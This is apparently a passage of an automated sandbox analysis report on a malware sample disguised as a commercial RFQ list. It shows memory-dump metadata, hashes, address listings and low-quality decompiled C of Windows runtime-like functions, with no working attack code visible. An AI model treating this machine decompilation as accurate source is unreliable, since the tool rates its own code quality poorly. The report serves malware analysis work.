                                                                                                                                                                                  0x3337f088
                                                                                                                                                                                  0x333bfde1
                                                                                                                                                                                  0x333bfde4
                                                                                                                                                                                  0x333bfde4
                                                                                                                                                                                  0x3337f08e
                                                                                                                                                                                  0x3337f095
                                                                                                                                                                                  0x3337f09d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337f09d
                                                                                                                                                                                  0x3337f062
                                                                                                                                                                                  0x333bfd29
                                                                                                                                                                                  0x3337f150
                                                                                                                                                                                  0x3337f153
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337f155
                                                                                                                                                                                  0x3337ef87
                                                                                                                                                                                  0x3337ef8a
                                                                                                                                                                                  0x3337f136
                                                                                                                                                                                  0x3337f13c
                                                                                                                                                                                  0x3337f13e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337f13e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337ef8a

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 354653f5c089dfb496e2547b2c6acdb466ce613cda811a95e9a19c26878d05dc
                                                                                                                                                                                  • Instruction ID: 44990588b80aeeaa5f3e55a7ee6f1eda5194178b455ef4c5b0a420d31567923b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 354653f5c089dfb496e2547b2c6acdb466ce613cda811a95e9a19c26878d05dc
                                                                                                                                                                                  • Instruction Fuzzy Hash: 38E1F175D00708CFDB25CFA9C980A9DBBF5FF48344F248A2AE495A7664DB78A941CF10
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3342A04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3446177414-0
                                                                                                                                                                                  • Opcode ID: 5ddb20e60cee82142a89dd9e759cc10854ff2d02a87f721b8986d13ff710415d
                                                                                                                                                                                  • Instruction ID: a2d0bbbf802ee89e37c7d9b87469598d6a1647a610c3efadaf063227322293a1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ddb20e60cee82142a89dd9e759cc10854ff2d02a87f721b8986d13ff710415d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D515A797046129FEB08CF18C891A29BBE5FB89360B14416DD916EB720DF71EC42CB88
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33387A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 29%
                                                                                                                                                                                  			E33387A4F(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t34;
				signed int _t35;
				signed int _t40;
				intOrPtr _t42;
				void* _t50;
				intOrPtr* _t55;
				intOrPtr* _t69;
				void* _t73;

				_t63 = __edx;
				_t51 = __ebx;
				_push(0x30);
				_push(0x3342c840);
				E333A7BE4(__ebx, __edi, __esi);
				_t66 = __ecx;
				 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
				_t69 =  *0x33445a7c;
				_push(__edx);
				if(_t69 == 0) {
					 *0x334491e0();
					E3338B490(__ecx, __edx,  *__ecx());
					_t55 =  *((intOrPtr*)(_t73 - 0x14));
					 *((intOrPtr*)(_t73 - 0x40)) =  *((intOrPtr*)( *_t55));
					 *((intOrPtr*)(_t73 - 0x24)) = _t55;
					_t34 =  *0x33445d38; // 0xfa86a38f
					 *(_t73 - 0x30) = _t34;
					__eflags =  *0x334465fc; // 0x6c29d6ea
					if(__eflags == 0) {
						_push(0);
						_push(4);
						_push(_t73 - 0x2c);
						_push(0x24);
						_push(0xffffffff);
						 *(_t73 - 0x1c) = E33392B20();
						__eflags =  *(_t73 - 0x1c);
						if( *(_t73 - 0x1c) < 0) {
							E333A8AA0(_t55, _t63,  *(_t73 - 0x1c));
						}
						 *0x334465fc =  *(_t73 - 0x2c);
					}
					_t35 =  *0x334465fc; // 0x6c29d6ea
					 *(_t73 - 0x20) = _t35;
					_push(0x20);
					asm("ror eax, cl");
					 *(_t73 - 0x34) =  *(_t73 - 0x30);
					_t40 =  *(_t73 - 0x34) ^  *(_t73 - 0x20);
					__eflags = _t40;
					 *(_t73 - 0x38) = _t40;
					if(__eflags == 0) {
						 *((intOrPtr*)(_t73 - 0x3c)) = E33408890(_t51, _t63, _t66, 0, __eflags,  *((intOrPtr*)(_t73 - 0x24)), 0x333250b4);
						_t42 =  *((intOrPtr*)(_t73 - 0x3c));
					} else {
						 *0x334491e0( *((intOrPtr*)(_t73 - 0x24)));
						_t42 =  *( *(_t73 - 0x38))();
					}
					 *((intOrPtr*)(_t73 - 0x28)) = _t42;
					return  *((intOrPtr*)(_t73 - 0x28));
				} else {
					 *0x334491e0();
					_t50 =  *_t69();
					 *(_t73 - 4) = 0xfffffffe;
					 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0x10));
					return _t50;
				}
			}











                                                                                                                                                                                  0x33387a4f
                                                                                                                                                                                  0x33387a4f
                                                                                                                                                                                  0x33387a4f
                                                                                                                                                                                  0x33387a51
                                                                                                                                                                                  0x33387a56
                                                                                                                                                                                  0x33387a5b
                                                                                                                                                                                  0x33387a5d
                                                                                                                                                                                  0x33387a61
                                                                                                                                                                                  0x33387a67
                                                                                                                                                                                  0x33387a6a
                                                                                                                                                                                  0x333c47f8
                                                                                                                                                                                  0x333c4801
                                                                                                                                                                                  0x333c4806
                                                                                                                                                                                  0x333c480d
                                                                                                                                                                                  0x333c4810
                                                                                                                                                                                  0x333c4813
                                                                                                                                                                                  0x333c4818
                                                                                                                                                                                  0x333c481d
                                                                                                                                                                                  0x333c4823
                                                                                                                                                                                  0x333c4825
                                                                                                                                                                                  0x333c4826
                                                                                                                                                                                  0x333c482b
                                                                                                                                                                                  0x333c482c
                                                                                                                                                                                  0x333c482e
                                                                                                                                                                                  0x333c4835
                                                                                                                                                                                  0x333c4838
                                                                                                                                                                                  0x333c483b
                                                                                                                                                                                  0x333c4840
                                                                                                                                                                                  0x333c4840
                                                                                                                                                                                  0x333c4848
                                                                                                                                                                                  0x333c4848
                                                                                                                                                                                  0x333c484d
                                                                                                                                                                                  0x333c4852
                                                                                                                                                                                  0x333c485b
                                                                                                                                                                                  0x333c4863
                                                                                                                                                                                  0x333c4865
                                                                                                                                                                                  0x333c486b
                                                                                                                                                                                  0x333c486b
                                                                                                                                                                                  0x333c486e
                                                                                                                                                                                  0x333c4871
                                                                                                                                                                                  0x333c4892
                                                                                                                                                                                  0x333c4895
                                                                                                                                                                                  0x333c4873
                                                                                                                                                                                  0x333c487b
                                                                                                                                                                                  0x333c4881
                                                                                                                                                                                  0x333c4881
                                                                                                                                                                                  0x333c4898
                                                                                                                                                                                  0x333c489e
                                                                                                                                                                                  0x33387a70
                                                                                                                                                                                  0x33387a72
                                                                                                                                                                                  0x33387a7c
                                                                                                                                                                                  0x333c48ac
                                                                                                                                                                                  0x333c48b6
                                                                                                                                                                                  0x333c48c2
                                                                                                                                                                                  0x333c48c2

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4281723722-0
                                                                                                                                                                                  • Opcode ID: b46cc876b6e52f423a0e255205e4bc6a0801b0f99a254a748e601ebd9db6991b
                                                                                                                                                                                  • Instruction ID: 6c4a88964e9809a553224eae3220d28d574af5fbf69f538ea4025d17e1bc1cca
                                                                                                                                                                                  • Opcode Fuzzy Hash: b46cc876b6e52f423a0e255205e4bc6a0801b0f99a254a748e601ebd9db6991b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F3111B5E013589FDF05EFA8D884A9EBBF0FB48321F10816AE421B7290CB359941CF50
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333558E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                                  			E333558E0(signed int __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				void* _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				char _v96;
				intOrPtr _v144;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				signed char _v176;
				intOrPtr _v180;
				char _v216;
				intOrPtr _v220;
				signed int _v228;
				intOrPtr* _v240;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				signed int _v260;
				char _v261;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v288;
				signed int _v292;
				char _v300;
				void* _v304;
				signed int _v308;
				char _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				char _v352;
				signed int* _v356;
				signed int _v360;
				signed int _v364;
				signed int _v380;
				intOrPtr _v388;
				signed int _v392;
				intOrPtr _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _t235;
				signed int _t236;
				intOrPtr* _t242;
				intOrPtr _t250;
				char _t253;
				char _t254;
				intOrPtr _t257;
				signed int _t261;
				intOrPtr _t262;
				char _t268;
				void* _t273;
				signed int* _t282;
				intOrPtr _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t297;
				char _t298;
				intOrPtr _t309;
				signed int _t316;
				char _t317;
				signed int _t322;
				signed int _t323;
				char _t332;
				intOrPtr _t339;
				intOrPtr _t340;
				intOrPtr* _t342;
				signed int _t343;
				signed int _t356;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t366;
				intOrPtr* _t368;
				char* _t375;
				signed int _t377;
				signed int _t380;
				intOrPtr* _t384;
				signed int _t387;
				intOrPtr _t388;
				void* _t389;
				void* _t390;

				_t390 = __eflags;
				_t379 = __esi;
				_t341 = __ebx;
				_push(0xfffffffe);
				_push(0x3342bd28);
				_push(E3339AD20);
				_push( *[fs:0x0]);
				_t388 = _t387 - 0x184;
				_t235 =  *0x3344b370;
				_v12 = _v12 ^ _t235;
				_t236 = _t235 ^ _t387;
				_v32 = _t236;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t236);
				 *[fs:0x0] =  &_v20;
				_v28 = _t388;
				_t377 = _a4;
				_v312 = 0;
				_v260 = _t377;
				_v250 = 0;
				_v251 = 0;
				_v247 = 0;
				_v246 = 0;
				_v252 = 0;
				_v245 = 0;
				_v248 = 0;
				_v253 = 0;
				_v304 = 0;
				_v268 = 0;
				E33358120();
				_v292 =  *[fs:0x30];
				_v8 = 0;
				E333580BE(__ebx,  &_v312, _t377, __esi, _t390);
				_t347 =  &_v304;
				E33358009( &_v304);
				_t242 = _v304;
				if(_t242 != 0) {
					_t347 =  &_v244;
					 *_t242 =  &_v244;
				}
				E33398F40( &_v244, 0, 0xd4);
				_t389 = _t388 + 0xc;
				_v8 = 1;
				_v8 = 2;
				L333553C0(_t377 + 0xe0);
				_v8 = 3;
				if( *((char*)(_t377 + 0xe5)) != 0) {
					_v276 = 0xc000010a;
					L73:
					_v246 = 1;
					_v247 = 1;
					L5:
					_v8 = 2;
					E33356055(_t377);
					_t394 = _v247;
					if(_v247 != 0) {
						L67:
						_v8 = 1;
						E33356074(_t341, _t347, _t377, _t379);
						_v8 = 0;
						E33356179(_t379);
						_t379 = 0;
						__eflags = 0;
						_v276 = 0;
						_v8 = 0xfffffffe;
						_t250 = E3338B490(_t347, _t371, 0);
						L68:
						_v300 = 0;
						L12:
						if((_v84 & 0x00000001) != 0) {
							E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v96);
							_v84 = _v84 & 0xfffffffe;
							_t250 = _v276;
						}
						if(_t250 != 0) {
							_t253 = _t250 - 0x80;
							__eflags = _t253;
							if(_t253 == 0) {
								goto L67;
							}
							_t254 = _t253 - 0x40;
							__eflags = _t254;
							if(_t254 == 0) {
								_v8 = 6;
								_t347 = 0;
								E333563CB(0);
								_v8 = 2;
								goto L8;
							}
							__eflags = _t254 != 0x42;
							if(_t254 != 0x42) {
								goto L8;
							}
							_v253 = 1;
							goto L67;
						} else {
							if(_t377 != 0) {
								_t268 =  *((intOrPtr*)(_t377 + 0x110));
								__eflags = _t268;
								if(_t268 != 0) {
									L16:
									if( *((intOrPtr*)(_t377 + 0x100)) != _t268) {
										_t379 = _t377 + 0x2c;
										L33362330(_t268, _t377 + 0x2c);
										E33424407(_t377);
										E333624D0(_t377 + 0x2c);
									}
									_t371 = _v288;
									_t347 =  &_v244;
									_t273 = E333564F0(_t341,  &_v244, _v288, _t377, _v300, _v280, _t377,  &_v245);
									if(_t273 != 0) {
										goto L67;
									} else {
										if(_v245 != _t273) {
											L8:
											_v268 = 0;
											_v64 = 0;
											_v60 = 0;
											_v56 = 0;
											_v52 = 0;
											_t341 = _v48;
											_v280 = 0x10;
											if(_t341 == 0) {
												_t257 =  *0x33446644; // 0x0
												_v392 = _t257 + 0x300000;
												_t261 = L33365D90(_t347,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t257 + 0x00300000 | 0x00000008, 0x1cc);
												__eflags = _t261;
												if(_t261 == 0) {
													L75:
													_v280 = 1;
													_t261 =  &_v64;
													L11:
													_v288 = _t261;
													_v300 = 0;
													_v8 = 5;
													_t262 =  *((intOrPtr*)(_t377 + 0x24));
													_v396 = _t262;
													_push( &_v96);
													_t347 =  &_v300;
													_push( &_v300);
													_push(_v280);
													_push(_v288);
													_push(_t262);
													_t250 = E333946E0();
													_v276 = _t250;
													_v8 = 2;
													if(_t250 != 0) {
														goto L68;
													}
													goto L12;
												}
												_t181 = _t261 + 0x1c0; // 0x1c0
												_t366 = _t181;
												 *_t366 = _t261;
												 *((intOrPtr*)(_t366 + 4)) = 1;
												 *((intOrPtr*)(_t366 + 8)) = 0x10;
												_v48 = _t366;
												_v280 = 0x10;
												goto L11;
											}
											if( *((intOrPtr*)(_t341 + 4)) != 1) {
												goto L75;
											}
											_t379 = _v48;
											E33398F40( *_t379, 0,  *(_t379 + 8) * 8 -  *(_t379 + 8) << 2);
											_t389 = _t389 + 0xc;
											_v280 =  *(_t379 + 8);
											_t261 =  *_t341;
											goto L11;
										}
										_t379 = _v64;
										if(_t379 != 0) {
											_v400 = _t379;
											_v168 =  *((intOrPtr*)(_t379 + 0x20));
											_v164 = _t379;
											_t372 =  &_v244;
											L33356D91(_t377,  &_v244,  *((intOrPtr*)(_t379 + 0x24)),  *(_t379 + 0x28) & 0x000000ff);
											E33356D60( &_v216);
											_v8 = 7;
											_t342 =  *((intOrPtr*)(_t379 + 0x20));
											_push( &_v56);
											_push(_v60);
											_push(_t379);
											_push( &_v216);
											__eflags = _t342 - E33356E00;
											if(_t342 == E33356E00) {
												E33356E00( &_v216);
												L33:
												_v8 = 2;
												L34:
												if((_v176 & 0x00000004) != 0) {
													_v248 = 1;
												}
												_v261 = _v180 == 4;
												_v8 = 9;
												E333561C3( &_v216, _t372);
												_v8 = 2;
												_v228 = 0;
												if(_v248 != 0) {
													_t282 = _t377 + 8;
													_v308 = _t282;
													_t343 =  *_t282;
													_t356 = _t282[1];
													_v328 = _t343;
													_v324 = _t356;
													goto L86;
													do {
														do {
															L86:
															_t380 = _t343;
															_v272 = _t380;
															_t371 = _t356;
															_v380 = _t371;
															_v328 = (_t380 + 0x00000001 ^ _t380) & 0x0000ffff ^ _t380;
															_t379 = _v308;
															asm("lock cmpxchg8b [esi]");
															_t343 = _t380;
															_v328 = _t343;
															_t356 = _t371;
															_v324 = _t356;
															__eflags = _t343 - _v272;
														} while (_t343 != _v272);
														__eflags = _t356 - _v380;
													} while (_t356 != _v380);
													_v352 = 3;
													_push(4);
													_push( &_v352);
													_push(9);
													_push( *((intOrPtr*)(_t377 + 0x24)));
													E333943A0();
												} else {
													_t288 =  *((intOrPtr*)(_t377 + 0x110));
													if(_t288 == 0) {
														_t288 =  *0x7ffe03c0;
													}
													if( *((intOrPtr*)(_t377 + 0x100)) != _t288) {
														L33362330(_t288, _t377 + 0x2c);
														E33424407(_t377);
														E333624D0(_t377 + 0x2c);
													}
													_t292 = _t377 + 8;
													_v356 = _t292;
													_t379 =  *_t292;
													_t347 = _t292[1];
													_v320 = _t379;
													_v316 = _t347;
													while(1) {
														_t341 = _t379;
														_v360 = _t341;
														_t371 = _t347;
														_v364 = _t371;
														_t293 = _t341 & 0x0000ffff;
														_v308 = _t293;
														if( *((char*)(_t377 + 0xe4)) != 0) {
															goto L67;
														}
														if(_t371 != 0) {
															__eflags = _t293;
															if(_t293 < 0) {
																__eflags = _v261;
																if(_v261 == 0) {
																	goto L41;
																}
															}
															_v249 = 0;
															_v316 = _t371 - 1;
															L42:
															_t297 = _t341;
															_t341 = _t379;
															asm("lock cmpxchg8b [esi]");
															_t379 = _t297;
															_v320 = _t379;
															_t347 = _t371;
															_v316 = _t347;
															if(_t379 != _v360 || _t347 != _v364) {
																continue;
															} else {
																_t298 = _v249;
																_v245 = _t298;
																if(_t298 != 0) {
																	goto L8;
																}
																goto L20;
															}
														}
														L41:
														_v249 = 1;
														_t379 = (_v308 + 0x00000001 ^ _t341) & 0x0000ffff ^ _t341;
														_v320 = _t379;
														goto L42;
													}
												}
												goto L67;
											}
											__eflags = _t342 - E33357290;
											if(_t342 != E33357290) {
												__eflags = _t342 - E33355570;
												if(_t342 != E33355570) {
													 *0x334491e0();
													 *_t342();
													_v8 = 2;
													goto L34;
												}
												E33355570( &_v216);
												goto L33;
											}
											E33357290();
											goto L33;
										}
										L20:
										_push( &_v272);
										_t371 =  &_v244;
										_t347 = _t377;
										if(E33356970(_t377,  &_v244) == 0) {
											goto L67;
										}
										if((_v84 & 0x00000001) != 0) {
											E3334BE18( &_v216);
											_v84 = _v84 & 0xfffffffe;
										}
										_t359 = _v272;
										_v228 = _t359;
										_v168 =  *((intOrPtr*)( *_t359));
										_v164 = _t359;
										_v144 = _v220;
										_t360 =  *[fs:0x18];
										_v80 =  *((intOrPtr*)(_t360 + 0xf50));
										_v76 =  *((intOrPtr*)(_t360 + 0xf54));
										_v72 =  *((intOrPtr*)(_t360 + 0xf58));
										_v68 =  *((intOrPtr*)(_t360 + 0xf5c));
										_t309 = _v220;
										if(_t309 != 0 && ( *(_t309 + 0x10c) & 0x00000001) == 0) {
											_t372 = _v160 | 0x00000008;
											_v160 = _t372;
											_t316 =  *[fs:0x18];
											_v408 = _t316;
											if( *((intOrPtr*)(_t316 + 0xf9c)) != 0) {
												_t317 = 1;
											} else {
												_t317 = 0;
											}
											if(_t317 != 0) {
												_t372 = _t372 | 0x00000004;
												_v160 = _t372;
											}
											if(E33356929() != 0) {
												_v160 = _t372;
											}
											if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xa0)) + 0xc)) ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
												_v160 = _v160 | 0x00000020;
											}
											_t322 =  *[fs:0x18];
											_v404 = _t322;
											if( *((intOrPtr*)(_t322 + 0xfb8)) != 0) {
												_v160 = _v160 | 0x00000040;
											}
											_t323 =  *[fs:0x18];
											_v380 = _t323;
											if( *((intOrPtr*)(_t323 + 0xf88)) != 0) {
												_v160 = _v160 | 0x00000080;
											}
										}
										_v8 = 8;
										_t361 = _v272;
										_t384 =  *((intOrPtr*)( *_t361));
										_push(_t361);
										_push( &_v216);
										if(_t384 != E33356B70) {
											__eflags = _t384 - E333556E0;
											if(_t384 != E333556E0) {
												 *0x334491e0();
												 *_t384();
											} else {
												E333556E0(_t361);
											}
										} else {
											E33356B70();
										}
										goto L33;
									}
								}
							}
							_t268 =  *0x7ffe03c0;
							goto L16;
						}
					}
					E33357F98(_t341, _t377,  &_v244, _t377, _t379, _t394);
					_v252 = 1;
					_t379 = _v292;
					L33362330(_t379 + 0x250, _t379 + 0x250);
					_v8 = 4;
					_t332 = _t379 + 0x254;
					_t368 =  *((intOrPtr*)(_t332 + 4));
					if( *_t368 != _t332) {
						asm("int 0x29");
						__eflags = _v292 + 0x250;
						return E333624D0(_v292 + 0x250);
					}
					_v244 = _t332;
					_v240 = _t368;
					_t375 =  &_v244;
					 *_t368 = _t375;
					 *((intOrPtr*)(_t332 + 4)) = _t375;
					_v251 = 1;
					_v8 = 2;
					L71();
					E33398F40( &_v216, 0, 0x98);
					_t389 = _t389 + 0xc;
					asm("lock inc dword [edi+0xf8]");
					_v250 = 1;
					_t371 =  &_v44;
					_t347 = _t377;
					E33354A09(_t377,  &_v44, 0);
					goto L8;
				}
				_t339 =  *((intOrPtr*)(_t377 + 0x24));
				_v388 = _t339;
				_push(_t339);
				_t340 = E333929A0();
				_v276 = _t340;
				if(_t340 < 0) {
					goto L73;
				}
				asm("lock inc dword [edi]");
				_v246 = 1;
				goto L5;
			}












































































































                                                                                                                                                                                  0x333558e0
                                                                                                                                                                                  0x333558e0
                                                                                                                                                                                  0x333558e0
                                                                                                                                                                                  0x333558e5
                                                                                                                                                                                  0x333558e7
                                                                                                                                                                                  0x333558ec
                                                                                                                                                                                  0x333558f7
                                                                                                                                                                                  0x333558f8
                                                                                                                                                                                  0x333558fe
                                                                                                                                                                                  0x33355903
                                                                                                                                                                                  0x33355906
                                                                                                                                                                                  0x33355908
                                                                                                                                                                                  0x3335590b
                                                                                                                                                                                  0x3335590c
                                                                                                                                                                                  0x3335590d
                                                                                                                                                                                  0x3335590e
                                                                                                                                                                                  0x33355912
                                                                                                                                                                                  0x33355918
                                                                                                                                                                                  0x3335591b
                                                                                                                                                                                  0x3335591e
                                                                                                                                                                                  0x33355928
                                                                                                                                                                                  0x3335592e
                                                                                                                                                                                  0x33355935
                                                                                                                                                                                  0x3335593c
                                                                                                                                                                                  0x33355943
                                                                                                                                                                                  0x3335594a
                                                                                                                                                                                  0x33355951
                                                                                                                                                                                  0x33355958
                                                                                                                                                                                  0x3335595f
                                                                                                                                                                                  0x33355966
                                                                                                                                                                                  0x33355970
                                                                                                                                                                                  0x3335597a
                                                                                                                                                                                  0x33355985
                                                                                                                                                                                  0x3335598b
                                                                                                                                                                                  0x33355998
                                                                                                                                                                                  0x3335599d
                                                                                                                                                                                  0x333559a3
                                                                                                                                                                                  0x333559a8
                                                                                                                                                                                  0x333559b0
                                                                                                                                                                                  0x333559b2
                                                                                                                                                                                  0x333559b8
                                                                                                                                                                                  0x333559b8
                                                                                                                                                                                  0x333559c8
                                                                                                                                                                                  0x333559cd
                                                                                                                                                                                  0x333559d0
                                                                                                                                                                                  0x333559d7
                                                                                                                                                                                  0x333559e5
                                                                                                                                                                                  0x333559ea
                                                                                                                                                                                  0x333559f8
                                                                                                                                                                                  0x333b0745
                                                                                                                                                                                  0x333b074f
                                                                                                                                                                                  0x333b074f
                                                                                                                                                                                  0x333b0756
                                                                                                                                                                                  0x33355a25
                                                                                                                                                                                  0x33355a25
                                                                                                                                                                                  0x33355a2c
                                                                                                                                                                                  0x33355a31
                                                                                                                                                                                  0x33355a38
                                                                                                                                                                                  0x33355fef
                                                                                                                                                                                  0x33355fef
                                                                                                                                                                                  0x33355ff6
                                                                                                                                                                                  0x33355ffb
                                                                                                                                                                                  0x33356002
                                                                                                                                                                                  0x33356007
                                                                                                                                                                                  0x33356007
                                                                                                                                                                                  0x33356009
                                                                                                                                                                                  0x3335600f
                                                                                                                                                                                  0x33356017
                                                                                                                                                                                  0x3335601c
                                                                                                                                                                                  0x3335601c
                                                                                                                                                                                  0x33355b95
                                                                                                                                                                                  0x33355b99
                                                                                                                                                                                  0x33355f2d
                                                                                                                                                                                  0x33355f32
                                                                                                                                                                                  0x33355f36
                                                                                                                                                                                  0x33355f36
                                                                                                                                                                                  0x33355ba1
                                                                                                                                                                                  0x33355fcf
                                                                                                                                                                                  0x33355fcf
                                                                                                                                                                                  0x33355fd4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33355fd6
                                                                                                                                                                                  0x33355fd6
                                                                                                                                                                                  0x33355fd9
                                                                                                                                                                                  0x333b07dc
                                                                                                                                                                                  0x333b07e3
                                                                                                                                                                                  0x333b07e5
                                                                                                                                                                                  0x333b07ea
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b07ea
                                                                                                                                                                                  0x33355fdf
                                                                                                                                                                                  0x33355fe2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33355fe8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33355ba7
                                                                                                                                                                                  0x33355ba9
                                                                                                                                                                                  0x33355e71
                                                                                                                                                                                  0x33355e77
                                                                                                                                                                                  0x33355e79
                                                                                                                                                                                  0x33355bb4
                                                                                                                                                                                  0x33355bba
                                                                                                                                                                                  0x333b0836
                                                                                                                                                                                  0x333b083a
                                                                                                                                                                                  0x333b0841
                                                                                                                                                                                  0x333b0847
                                                                                                                                                                                  0x333b0847
                                                                                                                                                                                  0x33355bd4
                                                                                                                                                                                  0x33355bda
                                                                                                                                                                                  0x33355be0
                                                                                                                                                                                  0x33355be7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33355bed
                                                                                                                                                                                  0x33355bf3
                                                                                                                                                                                  0x33355ae0
                                                                                                                                                                                  0x33355ae0
                                                                                                                                                                                  0x33355aec
                                                                                                                                                                                  0x33355aef
                                                                                                                                                                                  0x33355af2
                                                                                                                                                                                  0x33355af5
                                                                                                                                                                                  0x33355af8
                                                                                                                                                                                  0x33355afb
                                                                                                                                                                                  0x33355b07
                                                                                                                                                                                  0x33355f69
                                                                                                                                                                                  0x33355f73
                                                                                                                                                                                  0x33355f8b
                                                                                                                                                                                  0x33355f90
                                                                                                                                                                                  0x33355f92
                                                                                                                                                                                  0x333b077f
                                                                                                                                                                                  0x333b077f
                                                                                                                                                                                  0x333b0789
                                                                                                                                                                                  0x33355b43
                                                                                                                                                                                  0x33355b43
                                                                                                                                                                                  0x33355b49
                                                                                                                                                                                  0x33355b53
                                                                                                                                                                                  0x33355b5a
                                                                                                                                                                                  0x33355b5d
                                                                                                                                                                                  0x33355b66
                                                                                                                                                                                  0x33355b67
                                                                                                                                                                                  0x33355b6d
                                                                                                                                                                                  0x33355b6e
                                                                                                                                                                                  0x33355b74
                                                                                                                                                                                  0x33355b7a
                                                                                                                                                                                  0x33355b7b
                                                                                                                                                                                  0x33355b80
                                                                                                                                                                                  0x33355b86
                                                                                                                                                                                  0x33355b8f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33355b8f
                                                                                                                                                                                  0x33355f98
                                                                                                                                                                                  0x33355f98
                                                                                                                                                                                  0x33355f9e
                                                                                                                                                                                  0x33355fa0
                                                                                                                                                                                  0x33355fa7
                                                                                                                                                                                  0x33355fae
                                                                                                                                                                                  0x33355fb1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33355fb1
                                                                                                                                                                                  0x33355b13
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33355b19
                                                                                                                                                                                  0x33355b30
                                                                                                                                                                                  0x33355b35
